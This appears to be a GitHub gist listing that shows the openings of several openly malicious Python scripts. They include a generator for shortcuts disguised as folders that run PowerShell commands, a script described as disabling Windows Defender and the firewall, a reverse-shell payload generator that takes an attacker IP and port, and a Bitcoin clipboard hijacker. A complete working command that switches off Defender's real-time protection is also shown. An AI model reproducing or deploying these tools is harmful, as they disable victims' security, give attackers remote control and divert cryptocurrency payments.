spicesouls
/ EvilShortcutGenerator.py
Last active
August 4, 2021 16:02
Generates Windows Shortcuts that execute powershell commands while appearing as a folder.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Generates Windows Shortcuts that execute powershell commands while appearing as a folder. | |
| # ( inspired by the technique used here: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ ) | |
| from win32com.client import Dispatch | |
| import codecs, os | |
| COMMAND = "calc.exe" # What you want Powershell to execute | |
| #COMMAND = "netsh wlan show profiles" | |
| BASEPATH = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' |
spicesouls
/ chungusware.py
Created
April 10, 2021 16:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Chungus Ware | |
| - because why not? - | |
| This script: | |
| 1. Disables Windows Defender | |
| 2. Disables Windows Firewall | |
| 3. Displays a little message in notepad | |
| ⣿⣿⣿⣿⡿⠟⠛⠛⠛⠛⠉⠉⠙⠛⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⠟⠀⠀ |
spicesouls
/ PowershellReverseShell.py
Created
April 7, 2021 14:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import codecs | |
| # CREDIT TO SETOOLKIT / TRUSTED SEC FOR POWERSHELL CODE! | |
| # CHECK IT OUT ORIGINALLY @ https://github.com/trustedsec/social-engineer-toolkit | |
| IP = str(input('IP > ')) | |
| PORT = str(input('PORT > ')) | |
| def ps_encode(code): | |
| # Powershell Base64 Encoding/Decoding sits on utf-16-le :/ | |
| return codecs.encode(codecs.encode(code,'utf-16-le'),'base64').decode('utf-8').replace('\n','') |
spicesouls
/ BitcoinAddressClipboardReplacer.py
Created
April 6, 2021 16:09
This malicious script detects Bitcoin addresses in the clipboard and replaces them with the attacker's Bitcoin address.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This malicious script detects Bitcoin addresses in the clipboard and replaces them with the attacker's Bitcoin address. | |
| import re | |
| import tkinter as tk | |
| ATTACKERS_BTC_ADDRESS = 'XXXXXXXXXXXXXXX' | |
| REGEX = "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$" # Bitcoin Address Regex | |
| root = tk.Tk() | |
| root.withdraw() # Disable any visible Tkinter windows coming up |
spicesouls
/ DisableWindowsDefender.py
Created
April 3, 2021 13:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| path = os.environ["ProgramFiles"].replace('Program Files',"'Program Files'") + "\\'Windows Defender'\\MpCmdRun.exe" | |
| cmd='"' + path + '" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableRealtimeMonitoring $true' | |
| os.system('powershell.exe ' + cmd) |